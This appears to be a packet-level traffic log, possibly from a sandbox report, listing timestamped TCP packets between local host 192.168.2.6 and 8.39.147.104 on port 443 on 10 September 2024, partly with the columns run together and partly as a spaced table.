                                                                                Sep 10, 2024 16:33:40.424840927 CEST443497188.39.147.104192.168.2.6
                                                                                Sep 10, 2024 16:33:40.424864054 CEST49718443192.168.2.68.39.147.104
                                                                                Sep 10, 2024 16:33:40.425296068 CEST49718443192.168.2.68.39.147.104
                                                                                Sep 10, 2024 16:33:40.425429106 CEST443497188.39.147.104192.168.2.6
                                                                                Sep 10, 2024 16:33:40.425470114 CEST443497188.39.147.104192.168.2.6
                                                                                Sep 10, 2024 16:33:40.425513983 CEST49718443192.168.2.68.39.147.104
                                                                                Sep 10, 2024 16:33:40.425513983 CEST49718443192.168.2.68.39.147.104
                                                                                Sep 10, 2024 16:33:40.425529003 CEST443497188.39.147.104192.168.2.6
                                                                                Sep 10, 2024 16:33:40.425622940 CEST49718443192.168.2.68.39.147.104
                                                                                Sep 10, 2024 16:33:40.456500053 CEST443497188.39.147.104192.168.2.6
                                                                                Sep 10, 2024 16:33:40.456527948 CEST443497188.39.147.104192.168.2.6
                                                                                Sep 10, 2024 16:33:40.456623077 CEST49718443192.168.2.68.39.147.104
                                                                                Sep 10, 2024 16:33:40.456623077 CEST49718443192.168.2.68.39.147.104
                                                                                Sep 10, 2024 16:33:40.456640959 CEST443497188.39.147.104192.168.2.6
                                                                                Sep 10, 2024 16:33:40.456749916 CEST49718443192.168.2.68.39.147.104
                                                                                Sep 10, 2024 16:33:40.523576021 CEST443497188.39.147.104192.168.2.6
                                                                                Sep 10, 2024 16:33:40.523643970 CEST443497188.39.147.104192.168.2.6
                                                                                Sep 10, 2024 16:33:40.523653984 CEST49718443192.168.2.68.39.147.104
                                                                                Sep 10, 2024 16:33:40.523677111 CEST443497188.39.147.104192.168.2.6
                                                                                Sep 10, 2024 16:33:40.523745060 CEST49718443192.168.2.68.39.147.104
                                                                                Sep 10, 2024 16:33:40.523745060 CEST49718443192.168.2.68.39.147.104
                                                                                Sep 10, 2024 16:33:40.523912907 CEST443497188.39.147.104192.168.2.6
                                                                                Sep 10, 2024 16:33:40.523955107 CEST443497188.39.147.104192.168.2.6
                                                                                Sep 10, 2024 16:33:40.523986101 CEST49718443192.168.2.68.39.147.104
                                                                                Sep 10, 2024 16:33:40.524007082 CEST443497188.39.147.104192.168.2.6
                                                                                Sep 10, 2024 16:33:40.524039984 CEST49718443192.168.2.68.39.147.104
                                                                                Sep 10, 2024 16:33:40.524039984 CEST49718443192.168.2.68.39.147.104
                                                                                Sep 10, 2024 16:33:40.524398088 CEST443497188.39.147.104192.168.2.6
                                                                                Sep 10, 2024 16:33:40.524446011 CEST443497188.39.147.104192.168.2.6
                                                                                Sep 10, 2024 16:33:40.524480104 CEST49718443192.168.2.68.39.147.104
                                                                                Sep 10, 2024 16:33:40.524487019 CEST443497188.39.147.104192.168.2.6
                                                                                Sep 10, 2024 16:33:40.524527073 CEST49718443192.168.2.68.39.147.104
                                                                                Sep 10, 2024 16:33:40.524527073 CEST49718443192.168.2.68.39.147.104
                                                                                Sep 10, 2024 16:33:40.525257111 CEST443497188.39.147.104192.168.2.6
                                                                                Sep 10, 2024 16:33:40.525279999 CEST443497188.39.147.104192.168.2.6
                                                                                Sep 10, 2024 16:33:40.525336027 CEST49718443192.168.2.68.39.147.104
                                                                                Sep 10, 2024 16:33:40.525399923 CEST443497188.39.147.104192.168.2.6
                                                                                Sep 10, 2024 16:33:40.525427103 CEST49718443192.168.2.68.39.147.104
                                                                                Sep 10, 2024 16:33:40.525490999 CEST49718443192.168.2.68.39.147.104
                                                                                Sep 10, 2024 16:33:40.525542974 CEST443497188.39.147.104192.168.2.6
                                                                                Sep 10, 2024 16:33:40.525585890 CEST443497188.39.147.104192.168.2.6
                                                                                Sep 10, 2024 16:33:40.525672913 CEST49718443192.168.2.68.39.147.104
                                                                                Sep 10, 2024 16:33:40.525672913 CEST49718443192.168.2.68.39.147.104
                                                                                Sep 10, 2024 16:33:40.525691032 CEST443497188.39.147.104192.168.2.6
                                                                                Sep 10, 2024 16:33:40.525726080 CEST49718443192.168.2.68.39.147.104
Timestamp                             Source Port  Dest Port  Source IP     Dest IP
Sep 10, 2024 16:33:40.526071072 CEST  443          49718      8.39.147.104  192.168.2.6
Sep 10, 2024 16:33:40.526117086 CEST  443          49718      8.39.147.104  192.168.2.6
Sep 10, 2024 16:33:40.526194096 CEST  49718        443        192.168.2.6   8.39.147.104
Sep 10, 2024 16:33:40.526194096 CEST  49718        443        192.168.2.6   8.39.147.104
Sep 10, 2024 16:33:40.526201963 CEST  443          49718      8.39.147.104  192.168.2.6
Sep 10, 2024 16:33:40.526328087 CEST  49718        443        192.168.2.6   8.39.147.104
Sep 10, 2024 16:33:40.526752949 CEST  49718        443        192.168.2.6   8.39.147.104
Sep 10, 2024 16:33:40.526923895 CEST  443          49718      8.39.147.104  192.168.2.6
Sep 10, 2024 16:33:40.526966095 CEST  443          49718      8.39.147.104  192.168.2.6
Sep 10, 2024 16:33:40.527034998 CEST  49718        443        192.168.2.6   8.39.147.104
Sep 10, 2024 16:33:40.527034998 CEST  49718        443        192.168.2.6   8.39.147.104
Sep 10, 2024 16:33:40.527044058 CEST  443          49718      8.39.147.104  192.168.2.6
Sep 10, 2024 16:33:40.527417898 CEST  49718        443        192.168.2.6   8.39.147.104
Sep 10, 2024 16:33:40.527417898 CEST  49718        443        192.168.2.6   8.39.147.104
Sep 10, 2024 16:33:40.548536062 CEST  443          49718      8.39.147.104  192.168.2.6
Sep 10, 2024 16:33:40.548552036 CEST  443          49718      8.39.147.104  192.168.2.6
Sep 10, 2024 16:33:40.548597097 CEST  49718        443        192.168.2.6   8.39.147.104
Sep 10, 2024 16:33:40.548604012 CEST  443          49718      8.39.147.104  192.168.2.6
Sep 10, 2024 16:33:40.548760891 CEST  49718        443        192.168.2.6   8.39.147.104
Sep 10, 2024 16:33:40.574158907 CEST  49718        443        192.168.2.6   8.39.147.104
Sep 10, 2024 16:33:40.621686935 CEST  443          49718      8.39.147.104  192.168.2.6
Sep 10, 2024 16:33:40.621717930 CEST  443          49718      8.39.147.104  192.168.2.6
Sep 10, 2024 16:33:40.621908903 CEST  49718        443        192.168.2.6   8.39.147.104
Sep 10, 2024 16:33:40.621908903 CEST  49718        443        192.168.2.6   8.39.147.104
Sep 10, 2024 16:33:40.621928930 CEST  443          49718      8.39.147.104  192.168.2.6
Sep 10, 2024 16:33:40.622061968 CEST  49718        443        192.168.2.6   8.39.147.104
Sep 10, 2024 16:33:40.622179031 CEST  443          49718      8.39.147.104  192.168.2.6
Sep 10, 2024 16:33:40.622195005 CEST  443          49718      8.39.147.104  192.168.2.6
Sep 10, 2024 16:33:40.622243881 CEST  49718        443        192.168.2.6   8.39.147.104
Sep 10, 2024 16:33:40.622263908 CEST  443          49718      8.39.147.104  192.168.2.6
Sep 10, 2024 16:33:40.622279882 CEST  49718        443        192.168.2.6   8.39.147.104
Sep 10, 2024 16:33:40.622361898 CEST  49718        443        192.168.2.6   8.39.147.104
Sep 10, 2024 16:33:40.622616053 CEST  443          49718      8.39.147.104  192.168.2.6
Sep 10, 2024 16:33:40.622632980 CEST  443          49718      8.39.147.104  192.168.2.6
Sep 10, 2024 16:33:40.622665882 CEST  49718        443        192.168.2.6   8.39.147.104
Sep 10, 2024 16:33:40.622673035 CEST  443          49718      8.39.147.104  192.168.2.6
Sep 10, 2024 16:33:40.622706890 CEST  49718        443        192.168.2.6   8.39.147.104
Sep 10, 2024 16:33:40.622806072 CEST  49718        443        192.168.2.6   8.39.147.104
Sep 10, 2024 16:33:40.623051882 CEST  443          49718      8.39.147.104  192.168.2.6
Sep 10, 2024 16:33:40.623069048 CEST  443          49718      8.39.147.104  192.168.2.6
Sep 10, 2024 16:33:40.623135090 CEST  49718        443        192.168.2.6   8.39.147.104
Sep 10, 2024 16:33:40.623143911 CEST  443          49718      8.39.147.104  192.168.2.6
Sep 10, 2024 16:33:40.623184919 CEST  49718        443        192.168.2.6   8.39.147.104
Sep 10, 2024 16:33:40.623718023 CEST  443          49718      8.39.147.104  192.168.2.6
Sep 10, 2024 16:33:40.623759985 CEST  443          49718      8.39.147.104  192.168.2.6
Sep 10, 2024 16:33:40.623795986 CEST  49718        443        192.168.2.6   8.39.147.104
Sep 10, 2024 16:33:40.623804092 CEST  443          49718      8.39.147.104  192.168.2.6
Sep 10, 2024 16:33:40.623842001 CEST  49718        443        192.168.2.6   8.39.147.104
Sep 10, 2024 16:33:40.623991013 CEST  49718        443        192.168.2.6   8.39.147.104
Sep 10, 2024 16:33:40.623991966 CEST  443          49718      8.39.147.104  192.168.2.6
Sep 10, 2024 16:33:40.624022961 CEST  443          49718      8.39.147.104  192.168.2.6
Sep 10, 2024 16:33:40.624073029 CEST  443          49718      8.39.147.104  192.168.2.6
Sep 10, 2024 16:33:40.624075890 CEST  49718        443        192.168.2.6   8.39.147.104
Sep 10, 2024 16:33:40.624075890 CEST  49718        443        192.168.2.6   8.39.147.104
Sep 10, 2024 16:33:40.624099016 CEST  443          49718      8.39.147.104  192.168.2.6
Sep 10, 2024 16:33:40.624156952 CEST  49718        443        192.168.2.6   8.39.147.104
Sep 10, 2024 16:33:40.624221087 CEST  49718        443        192.168.2.6   8.39.147.104
Sep 10, 2024 16:33:40.624617100 CEST  443          49718      8.39.147.104  192.168.2.6
Sep 10, 2024 16:33:40.624659061 CEST  443          49718      8.39.147.104  192.168.2.6
Sep 10, 2024 16:33:40.624681950 CEST  49718        443        192.168.2.6   8.39.147.104
Sep 10, 2024 16:33:40.624690056 CEST  443          49718      8.39.147.104  192.168.2.6
Sep 10, 2024 16:33:40.624726057 CEST  49718        443        192.168.2.6   8.39.147.104
Sep 10, 2024 16:33:40.624741077 CEST  49718        443        192.168.2.6   8.39.147.104
Sep 10, 2024 16:33:40.634912968 CEST  443          49718      8.39.147.104  192.168.2.6
Sep 10, 2024 16:33:40.634959936 CEST  443          49718      8.39.147.104  192.168.2.6
Sep 10, 2024 16:33:40.635035038 CEST  49718        443        192.168.2.6   8.39.147.104
Sep 10, 2024 16:33:40.635045052 CEST  443          49718      8.39.147.104  192.168.2.6
Sep 10, 2024 16:33:40.635072947 CEST  49718        443        192.168.2.6   8.39.147.104
Sep 10, 2024 16:33:40.635092020 CEST  49718        443        192.168.2.6   8.39.147.104
Sep 10, 2024 16:33:40.647054911 CEST  49718        443        192.168.2.6   8.39.147.104
Sep 10, 2024 16:33:40.708410025 CEST  443          49718      8.39.147.104  192.168.2.6
Sep 10, 2024 16:33:40.708427906 CEST  443          49718      8.39.147.104  192.168.2.6
Sep 10, 2024 16:33:40.708478928 CEST  49718        443        192.168.2.6   8.39.147.104
Sep 10, 2024 16:33:40.708503008 CEST  443          49718      8.39.147.104  192.168.2.6
Sep 10, 2024 16:33:40.708525896 CEST  49718        443        192.168.2.6   8.39.147.104
Sep 10, 2024 16:33:40.708657026 CEST  443          49718      8.39.147.104  192.168.2.6
Sep 10, 2024 16:33:40.708667994 CEST  49718        443        192.168.2.6   8.39.147.104
Sep 10, 2024 16:33:40.708678007 CEST  443          49718      8.39.147.104  192.168.2.6
Sep 10, 2024 16:33:40.708693981 CEST  443          49718      8.39.147.104  192.168.2.6
Sep 10, 2024 16:33:40.708745956 CEST  49718        443        192.168.2.6   8.39.147.104
Sep 10, 2024 16:33:40.708854914 CEST  49718        443        192.168.2.6   8.39.147.104
Sep 10, 2024 16:33:40.709289074 CEST  443          49718      8.39.147.104  192.168.2.6
Sep 10, 2024 16:33:40.709306955 CEST  443          49718      8.39.147.104  192.168.2.6
Sep 10, 2024 16:33:40.709362030 CEST  49718        443        192.168.2.6   8.39.147.104
Sep 10, 2024 16:33:40.709369898 CEST  443          49718      8.39.147.104  192.168.2.6
Sep 10, 2024 16:33:40.709429026 CEST  49718        443        192.168.2.6   8.39.147.104
Sep 10, 2024 16:33:40.709429026 CEST  49718        443        192.168.2.6   8.39.147.104
Sep 10, 2024 16:33:40.709759951 CEST  443          49718      8.39.147.104  192.168.2.6
Sep 10, 2024 16:33:40.709778070 CEST  443          49718      8.39.147.104  192.168.2.6
Sep 10, 2024 16:33:40.709821939 CEST  49718        443        192.168.2.6   8.39.147.104
Sep 10, 2024 16:33:40.709832907 CEST  443          49718      8.39.147.104  192.168.2.6
Sep 10, 2024 16:33:40.709845066 CEST  49718        443        192.168.2.6   8.39.147.104
Sep 10, 2024 16:33:40.709964037 CEST  49718        443        192.168.2.6   8.39.147.104
Sep 10, 2024 16:33:40.710059881 CEST  443          49718      8.39.147.104  192.168.2.6
Sep 10, 2024 16:33:40.710074902 CEST  443          49718      8.39.147.104  192.168.2.6
Sep 10, 2024 16:33:40.710115910 CEST  49718        443        192.168.2.6   8.39.147.104
Sep 10, 2024 16:33:40.710133076 CEST  443          49718      8.39.147.104  192.168.2.6
Sep 10, 2024 16:33:40.710155010 CEST  49718        443        192.168.2.6   8.39.147.104
Sep 10, 2024 16:33:40.710165024 CEST  49718        443        192.168.2.6   8.39.147.104
Sep 10, 2024 16:33:40.710680962 CEST  443          49718      8.39.147.104  192.168.2.6
Sep 10, 2024 16:33:40.710696936 CEST  443          49718      8.39.147.104  192.168.2.6
Sep 10, 2024 16:33:40.710727930 CEST  49718        443        192.168.2.6   8.39.147.104
Sep 10, 2024 16:33:40.710736990 CEST  443          49718      8.39.147.104  192.168.2.6
Sep 10, 2024 16:33:40.710764885 CEST  49718        443        192.168.2.6   8.39.147.104
Sep 10, 2024 16:33:40.710866928 CEST  49718        443        192.168.2.6   8.39.147.104
Sep 10, 2024 16:33:40.711224079 CEST  443          49718      8.39.147.104  192.168.2.6
Sep 10, 2024 16:33:40.711240053 CEST  443          49718      8.39.147.104  192.168.2.6
Sep 10, 2024 16:33:40.711371899 CEST  49718        443        192.168.2.6   8.39.147.104
Sep 10, 2024 16:33:40.711371899 CEST  49718        443        192.168.2.6   8.39.147.104
Sep 10, 2024 16:33:40.711380959 CEST  443          49718      8.39.147.104  192.168.2.6
Sep 10, 2024 16:33:40.711431980 CEST  49718        443        192.168.2.6   8.39.147.104
Sep 10, 2024 16:33:40.726768970 CEST  443          49718      8.39.147.104  192.168.2.6
Sep 10, 2024 16:33:40.726785898 CEST  443          49718      8.39.147.104  192.168.2.6
Sep 10, 2024 16:33:40.726903915 CEST  49718        443        192.168.2.6   8.39.147.104
Sep 10, 2024 16:33:40.726903915 CEST  49718        443        192.168.2.6   8.39.147.104
Sep 10, 2024 16:33:40.726913929 CEST  443          49718      8.39.147.104  192.168.2.6
Sep 10, 2024 16:33:40.726950884 CEST  49718        443        192.168.2.6   8.39.147.104
Sep 10, 2024 16:33:40.766228914 CEST  49718        443        192.168.2.6   8.39.147.104
Sep 10, 2024 16:33:40.794487953 CEST  443          49718      8.39.147.104  192.168.2.6
Sep 10, 2024 16:33:40.794504881 CEST  443          49718      8.39.147.104  192.168.2.6
Sep 10, 2024 16:33:40.794585943 CEST  49718        443        192.168.2.6   8.39.147.104
Sep 10, 2024 16:33:40.794596910 CEST  443          49718      8.39.147.104  192.168.2.6
Sep 10, 2024 16:33:40.794641972 CEST  49718        443        192.168.2.6   8.39.147.104
Sep 10, 2024 16:33:40.794641972 CEST  49718        443        192.168.2.6   8.39.147.104
Sep 10, 2024 16:33:40.794795036 CEST  443          49718      8.39.147.104  192.168.2.6
Sep 10, 2024 16:33:40.794811964 CEST  443          49718      8.39.147.104  192.168.2.6
Sep 10, 2024 16:33:40.794904947 CEST  49718        443        192.168.2.6   8.39.147.104
Sep 10, 2024 16:33:40.794904947 CEST  49718        443        192.168.2.6   8.39.147.104
Sep 10, 2024 16:33:40.794924021 CEST  443          49718      8.39.147.104  192.168.2.6
Sep 10, 2024 16:33:40.795011044 CEST  49718        443        192.168.2.6   8.39.147.104
Sep 10, 2024 16:33:40.795327902 CEST  443          49718      8.39.147.104  192.168.2.6
Sep 10, 2024 16:33:40.795342922 CEST  443          49718      8.39.147.104  192.168.2.6
Sep 10, 2024 16:33:40.795407057 CEST  49718        443        192.168.2.6   8.39.147.104
Sep 10, 2024 16:33:40.795416117 CEST  443          49718      8.39.147.104  192.168.2.6
Sep 10, 2024 16:33:40.795430899 CEST  49718        443        192.168.2.6   8.39.147.104
Sep 10, 2024 16:33:40.795564890 CEST  49718        443        192.168.2.6   8.39.147.104
Sep 10, 2024 16:33:40.795842886 CEST  443          49718      8.39.147.104  192.168.2.6
Sep 10, 2024 16:33:40.795859098 CEST  443          49718      8.39.147.104  192.168.2.6
Sep 10, 2024 16:33:40.795981884 CEST  49718        443        192.168.2.6   8.39.147.104
Sep 10, 2024 16:33:40.795981884 CEST  49718        443        192.168.2.6   8.39.147.104
Sep 10, 2024 16:33:40.795993090 CEST  443          49718      8.39.147.104  192.168.2.6
Sep 10, 2024 16:33:40.796087027 CEST  49718        443        192.168.2.6   8.39.147.104
Sep 10, 2024 16:33:40.796292067 CEST  443          49718      8.39.147.104  192.168.2.6
Sep 10, 2024 16:33:40.796308041 CEST  443          49718      8.39.147.104  192.168.2.6
Sep 10, 2024 16:33:40.796428919 CEST  49718        443        192.168.2.6   8.39.147.104
Sep 10, 2024 16:33:40.796430111 CEST  49718        443        192.168.2.6   8.39.147.104
Sep 10, 2024 16:33:40.796439886 CEST  443          49718      8.39.147.104  192.168.2.6
Sep 10, 2024 16:33:40.796483994 CEST  49718        443        192.168.2.6   8.39.147.104
Sep 10, 2024 16:33:40.796657085 CEST  443          49718      8.39.147.104  192.168.2.6
Sep 10, 2024 16:33:40.796670914 CEST  443          49718      8.39.147.104  192.168.2.6
Sep 10, 2024 16:33:40.796786070 CEST  49718        443        192.168.2.6   8.39.147.104
Sep 10, 2024 16:33:40.796786070 CEST  49718        443        192.168.2.6   8.39.147.104
Sep 10, 2024 16:33:40.796794891 CEST  443          49718      8.39.147.104  192.168.2.6
Sep 10, 2024 16:33:40.796853065 CEST  49718        443        192.168.2.6   8.39.147.104
Sep 10, 2024 16:33:40.797152996 CEST  443          49718      8.39.147.104  192.168.2.6
Sep 10, 2024 16:33:40.797175884 CEST  443          49718      8.39.147.104  192.168.2.6
Sep 10, 2024 16:33:40.797249079 CEST  49718        443        192.168.2.6   8.39.147.104
Sep 10, 2024 16:33:40.797249079 CEST  49718        443        192.168.2.6   8.39.147.104
Sep 10, 2024 16:33:40.797256947 CEST  443          49718      8.39.147.104  192.168.2.6
Sep 10, 2024 16:33:40.797300100 CEST  49718        443        192.168.2.6   8.39.147.104
Sep 10, 2024 16:33:40.813138962 CEST  443          49718      8.39.147.104  192.168.2.6
Sep 10, 2024 16:33:40.813157082 CEST  443          49718      8.39.147.104  192.168.2.6
Sep 10, 2024 16:33:40.813251019 CEST  49718        443        192.168.2.6   8.39.147.104
Sep 10, 2024 16:33:40.813261032 CEST  443          49718      8.39.147.104  192.168.2.6
Sep 10, 2024 16:33:40.813332081 CEST  49718        443        192.168.2.6   8.39.147.104
Sep 10, 2024 16:33:40.882786989 CEST  443          49718      8.39.147.104  192.168.2.6
Sep 10, 2024 16:33:40.882817984 CEST  443          49718      8.39.147.104  192.168.2.6
Sep 10, 2024 16:33:40.882879972 CEST  443          49718      8.39.147.104  192.168.2.6
Sep 10, 2024 16:33:40.882939100 CEST  49718        443        192.168.2.6   8.39.147.104
Sep 10, 2024 16:33:40.882939100 CEST  49718        443        192.168.2.6   8.39.147.104
Sep 10, 2024 16:33:40.882939100 CEST  49718        443        192.168.2.6   8.39.147.104
Sep 10, 2024 16:33:40.882962942 CEST  443          49718      8.39.147.104  192.168.2.6
Sep 10, 2024 16:33:40.882982016 CEST  443          49718      8.39.147.104  192.168.2.6
Sep 10, 2024 16:33:40.883001089 CEST  443          49718      8.39.147.104  192.168.2.6
Sep 10, 2024 16:33:40.883131027 CEST  49718        443        192.168.2.6   8.39.147.104
Sep 10, 2024 16:33:40.883131027 CEST  49718        443        192.168.2.6   8.39.147.104
Sep 10, 2024 16:33:40.883143902 CEST  443          49718      8.39.147.104  192.168.2.6
Sep 10, 2024 16:33:40.883157015 CEST  443          49718      8.39.147.104  192.168.2.6
Sep 10, 2024 16:33:40.883291960 CEST  49718        443        192.168.2.6   8.39.147.104
Sep 10, 2024 16:33:40.883513927 CEST  443          49718      8.39.147.104  192.168.2.6
Sep 10, 2024 16:33:40.883538961 CEST  443          49718      8.39.147.104  192.168.2.6
Sep 10, 2024 16:33:40.883634090 CEST  443          49718      8.39.147.104  192.168.2.6
Sep 10, 2024 16:33:40.883657932 CEST  49718        443        192.168.2.6   8.39.147.104
Sep 10, 2024 16:33:40.883665085 CEST  443          49718      8.39.147.104  192.168.2.6
Sep 10, 2024 16:33:40.883771896 CEST  49718        443        192.168.2.6   8.39.147.104
Sep 10, 2024 16:33:40.883771896 CEST  49718        443        192.168.2.6   8.39.147.104
Sep 10, 2024 16:33:40.885087013 CEST  443          49718      8.39.147.104  192.168.2.6
Sep 10, 2024 16:33:40.885102034 CEST  443          49718      8.39.147.104  192.168.2.6
Sep 10, 2024 16:33:40.885216951 CEST  49718        443        192.168.2.6   8.39.147.104
Sep 10, 2024 16:33:40.885222912 CEST  443          49718      8.39.147.104  192.168.2.6
Sep 10, 2024 16:33:40.885238886 CEST  49718        443        192.168.2.6   8.39.147.104
Sep 10, 2024 16:33:40.899858952 CEST  443          49718      8.39.147.104  192.168.2.6
Sep 10, 2024 16:33:40.899879932 CEST  443          49718      8.39.147.104  192.168.2.6
Sep 10, 2024 16:33:40.900012016 CEST  49718        443        192.168.2.6   8.39.147.104
Sep 10, 2024 16:33:40.900012016 CEST  49718        443        192.168.2.6   8.39.147.104
Sep 10, 2024 16:33:40.900031090 CEST  443          49718      8.39.147.104  192.168.2.6
Sep 10, 2024 16:33:40.900124073 CEST  49718        443        192.168.2.6   8.39.147.104
Sep 10, 2024 16:33:41.054675102 CEST  49718        443        192.168.2.6   8.39.147.104
Sep 10, 2024 16:33:41.054693937 CEST  443          49718      8.39.147.104  192.168.2.6
Sep 10, 2024 16:33:41.054713011 CEST  443          49718      8.39.147.104  192.168.2.6
Sep 10, 2024 16:33:41.054739952 CEST  443          49718      8.39.147.104  192.168.2.6
Sep 10, 2024 16:33:41.054883957 CEST  49718        443        192.168.2.6   8.39.147.104
Sep 10, 2024 16:33:41.054893970 CEST  443          49718      8.39.147.104  192.168.2.6
Sep 10, 2024 16:33:41.054909945 CEST  443          49718      8.39.147.104  192.168.2.6
Sep 10, 2024 16:33:41.055116892 CEST  49718        443        192.168.2.6   8.39.147.104
Sep 10, 2024 16:33:41.055124044 CEST  443          49718      8.39.147.104  192.168.2.6
Sep 10, 2024 16:33:41.055133104 CEST  443          49718      8.39.147.104  192.168.2.6
Sep 10, 2024 16:33:41.055143118 CEST  443          49718      8.39.147.104  192.168.2.6
Sep 10, 2024 16:33:41.055181026 CEST  49718        443        192.168.2.6   8.39.147.104
Sep 10, 2024 16:33:41.055186033 CEST  443          49718      8.39.147.104  192.168.2.6
Sep 10, 2024 16:33:41.055246115 CEST  49718        443        192.168.2.6   8.39.147.104
Sep 10, 2024 16:33:41.055246115 CEST  49718        443        192.168.2.6   8.39.147.104
Sep 10, 2024 16:33:41.055253029 CEST  443          49718      8.39.147.104  192.168.2.6
Sep 10, 2024 16:33:41.055263996 CEST  443          49718      8.39.147.104  192.168.2.6
Sep 10, 2024 16:33:41.055270910 CEST  443          49718      8.39.147.104  192.168.2.6
Sep 10, 2024 16:33:41.055277109 CEST  443          49718      8.39.147.104  192.168.2.6
Sep 10, 2024 16:33:41.055358887 CEST  49718        443        192.168.2.6   8.39.147.104
Sep 10, 2024 16:33:41.055366039 CEST  443          49718      8.39.147.104  192.168.2.6
Sep 10, 2024 16:33:41.055375099 CEST  443          49718      8.39.147.104  192.168.2.6
Sep 10, 2024 16:33:41.055463076 CEST  49718        443        192.168.2.6   8.39.147.104
Sep 10, 2024 16:33:41.055470943 CEST  443          49718      8.39.147.104  192.168.2.6
Sep 10, 2024 16:33:41.055480957 CEST  443          49718      8.39.147.104  192.168.2.6
Sep 10, 2024 16:33:41.055485010 CEST  49718        443        192.168.2.6   8.39.147.104
Sep 10, 2024 16:33:41.055488110 CEST  443          49718      8.39.147.104  192.168.2.6
Sep 10, 2024 16:33:41.055491924 CEST  443          49718      8.39.147.104  192.168.2.6
Sep 10, 2024 16:33:41.055555105 CEST  49718        443        192.168.2.6   8.39.147.104
Sep 10, 2024 16:33:41.055560112 CEST  443          49718      8.39.147.104  192.168.2.6
Sep 10, 2024 16:33:41.055583000 CEST  49718        443        192.168.2.6   8.39.147.104
Sep 10, 2024 16:33:41.055624962 CEST  49718        443        192.168.2.6   8.39.147.104
Sep 10, 2024 16:33:41.055974007 CEST  443          49718      8.39.147.104  192.168.2.6
Sep 10, 2024 16:33:41.056005955 CEST  443          49718      8.39.147.104  192.168.2.6
Sep 10, 2024 16:33:41.056042910 CEST  49718        443        192.168.2.6   8.39.147.104
Sep 10, 2024 16:33:41.056051016 CEST  443          49718      8.39.147.104  192.168.2.6
Sep 10, 2024 16:33:41.056133986 CEST  49718        443        192.168.2.6   8.39.147.104
Sep 10, 2024 16:33:41.056446075 CEST  443          49718      8.39.147.104  192.168.2.6
Sep 10, 2024 16:33:41.056463957 CEST  443          49718      8.39.147.104  192.168.2.6
Sep 10, 2024 16:33:41.056557894 CEST  49718        443        192.168.2.6   8.39.147.104
Sep 10, 2024 16:33:41.056557894 CEST  49718        443        192.168.2.6   8.39.147.104
Sep 10, 2024 16:33:41.056574106 CEST  443          49718      8.39.147.104  192.168.2.6
Sep 10, 2024 16:33:41.072143078 CEST  443          49718      8.39.147.104  192.168.2.6
Sep 10, 2024 16:33:41.072156906 CEST  443          49718      8.39.147.104  192.168.2.6
Sep 10, 2024 16:33:41.072240114 CEST  49718        443        192.168.2.6   8.39.147.104
Sep 10, 2024 16:33:41.072325945 CEST  49718        443        192.168.2.6   8.39.147.104
Sep 10, 2024 16:33:41.283406019 CEST  443          49718      8.39.147.104  192.168.2.6
Sep 10, 2024 16:33:41.285346985 CEST  49718        443        192.168.2.6   8.39.147.104
                                                                                Sep 10, 2024 16:33:41.285362005 CEST443497188.39.147.104192.168.2.6
                                                                                Sep 10, 2024 16:33:41.285373926 CEST443497188.39.147.104192.168.2.6
                                                                                Sep 10, 2024 16:33:41.285495996 CEST49718443192.168.2.68.39.147.104
                                                                                Sep 10, 2024 16:33:41.287626982 CEST49718443192.168.2.68.39.147.104
                                                                                Sep 10, 2024 16:33:41.287631035 CEST443497188.39.147.104192.168.2.6
                                                                                Sep 10, 2024 16:33:41.287640095 CEST443497188.39.147.104192.168.2.6
                                                                                Sep 10, 2024 16:33:41.287697077 CEST443497188.39.147.104192.168.2.6
                                                                                Sep 10, 2024 16:33:41.287739992 CEST49718443192.168.2.68.39.147.104
                                                                                Sep 10, 2024 16:33:41.287744999 CEST443497188.39.147.104192.168.2.6
                                                                                Sep 10, 2024 16:33:41.287755966 CEST443497188.39.147.104192.168.2.6
                                                                                Sep 10, 2024 16:33:41.287785053 CEST49718443192.168.2.68.39.147.104
                                                                                Sep 10, 2024 16:33:41.287808895 CEST443497188.39.147.104192.168.2.6
                                                                                Sep 10, 2024 16:33:41.287848949 CEST49718443192.168.2.68.39.147.104
                                                                                Sep 10, 2024 16:33:41.287853003 CEST443497188.39.147.104192.168.2.6
                                                                                Sep 10, 2024 16:33:41.287868977 CEST443497188.39.147.104192.168.2.6
                                                                                Sep 10, 2024 16:33:41.287878990 CEST443497188.39.147.104192.168.2.6
                                                                                Sep 10, 2024 16:33:41.287892103 CEST49718443192.168.2.68.39.147.104
                                                                                Sep 10, 2024 16:33:41.287898064 CEST443497188.39.147.104192.168.2.6
                                                                                Sep 10, 2024 16:33:41.287975073 CEST49718443192.168.2.68.39.147.104
                                                                                Sep 10, 2024 16:33:41.287976027 CEST49718443192.168.2.68.39.147.104
                                                                                Sep 10, 2024 16:33:41.287981987 CEST443497188.39.147.104192.168.2.6
                                                                                Sep 10, 2024 16:33:41.287995100 CEST443497188.39.147.104192.168.2.6
                                                                                Sep 10, 2024 16:33:41.288006067 CEST443497188.39.147.104192.168.2.6
                                                                                Sep 10, 2024 16:33:41.288052082 CEST49718443192.168.2.68.39.147.104
                                                                                Sep 10, 2024 16:33:41.288055897 CEST443497188.39.147.104192.168.2.6
                                                                                Sep 10, 2024 16:33:41.288137913 CEST49718443192.168.2.68.39.147.104
                                                                                Sep 10, 2024 16:33:41.288137913 CEST49718443192.168.2.68.39.147.104
                                                                                Sep 10, 2024 16:33:41.288142920 CEST443497188.39.147.104192.168.2.6
                                                                                Sep 10, 2024 16:33:41.288156033 CEST443497188.39.147.104192.168.2.6
                                                                                Sep 10, 2024 16:33:41.288160086 CEST443497188.39.147.104192.168.2.6
                                                                                Sep 10, 2024 16:33:41.288289070 CEST49718443192.168.2.68.39.147.104
                                                                                Sep 10, 2024 16:33:41.288289070 CEST49718443192.168.2.68.39.147.104
                                                                                Sep 10, 2024 16:33:41.303293943 CEST49718443192.168.2.68.39.147.104
                                                                                Sep 10, 2024 16:33:41.303304911 CEST443497188.39.147.104192.168.2.6
                                                                                Sep 10, 2024 16:33:41.303363085 CEST49718443192.168.2.68.39.147.104
                                                                                Sep 10, 2024 16:33:41.305775881 CEST49718443192.168.2.68.39.147.104
                                                                                Sep 10, 2024 16:33:41.312732935 CEST443497188.39.147.104192.168.2.6
                                                                                Sep 10, 2024 16:33:41.312750101 CEST443497188.39.147.104192.168.2.6
                                                                                Sep 10, 2024 16:33:41.312825918 CEST49718443192.168.2.68.39.147.104
                                                                                Sep 10, 2024 16:33:41.312825918 CEST49718443192.168.2.68.39.147.104
                                                                                Sep 10, 2024 16:33:41.312833071 CEST443497188.39.147.104192.168.2.6
                                                                                Sep 10, 2024 16:33:41.313050032 CEST49718443192.168.2.68.39.147.104
